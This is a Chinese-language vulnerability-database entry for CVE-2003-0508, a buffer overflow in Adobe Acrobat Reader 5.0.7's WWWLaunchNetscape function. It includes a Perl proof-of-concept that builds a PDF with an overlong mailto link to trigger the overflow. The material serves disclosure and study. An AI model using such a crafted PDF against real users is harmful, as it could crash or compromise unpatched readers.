Adobe Acrobat Reader (acroread) WWWLaunchNetscape函数缓冲区溢出漏洞

Adobe Acrobat Reader (acroread) WWWLaunchNetscape函数缓冲区溢出漏洞

漏洞ID 1107403 漏洞类型 缓冲区溢出
发布时间 2003-07-01 更新时间 2003-08-07
图片[1]-Adobe Acrobat Reader (acroread) WWWLaunchNetscape函数缓冲区溢出漏洞-安全小百科CVE编号 CVE-2003-0508
图片[2]-Adobe Acrobat Reader (acroread) WWWLaunchNetscape函数缓冲区溢出漏洞-安全小百科CNNVD-ID CNNVD-200308-029
漏洞平台 Linux CVSS评分 7.5
|漏洞来源
https://www.exploit-db.com/exploits/22846
https://www.securityfocus.com/bid/82764
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200308-029
|漏洞详情
AdobeAcrobatReader(acroread)5.0.7及其早期版本的WWWLaunchNetscape函数存在缓冲区溢出漏洞。远程攻击者借助具有超长mailto链接的.pdf文件执行任意代码。
|漏洞EXP
source: http://www.securityfocus.com/bid/8069/info

An individual has reported that Adobe Acrobat Reader for Unix systems is vulnerable to a buffer overflow condition. The error is allegedly related to the processing of hyperlinks, in the function "WWWLaunchNetscape". The flaw is triggered only when Netscape is set as the browser to be used in the preferences (this is the default configuration). This vulnerability may be exploited through maliciously constructed PDF files. 

It should be noted that it is not confirmed that Acrobat Reader for Windows is not affected. Users of both versions should exhibit caution until there is a response from the vendor. 4.x versions of the reader are reportedly not prone to this issue.

#!/usr/bin/perl --
#
# Demo for acroread 5.0.7 on Debian Linux
#
print '
Writing TeX file ...
';
# For acroread 5.0.5 use 248 Bs instead of 504
open P, '>attack.tex';
print P '
documentclass[11pt]{letter}
usepackage{times}
usepackage[pdfpagemode=none,pdfstartview=FitH]{hyperref}
begin{document}
   href{mailto:X',("B"x504).("A"x4),'}
   {texttt{mailto:X("B"x504).("A"x4)}}
end{document}
';
close P;
#
print '
Running pdflatex ...
';
system 'pdflatex attack';
#
#!#
|受影响的产品
Adobe Reader 5.0.7
|参考资料

来源:BUGTRAQ
名称:20030701[sec-labs]AdobeAcrobatReader<=5.0.7BufferOverflow
链接:http://marc.theaimsgroup.com/?l=bugtraq&m;=105709569312583&w;=2
来源:BUGTRAQ
名称:20030709Acroread5.0.7bufferoverflow
链接:http://marc.theaimsgroup.com/?l=bugtraq&m;=105785749721291&w;=2

相关推荐: Norton Antivirus for MS Exchange Buffer Overflow Vulnerability

Norton Antivirus for MS Exchange Buffer Overflow Vulnerability 漏洞ID 1104078 漏洞类型 Boundary Condition Error 发布时间 2000-06-14 更新时间 200…

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享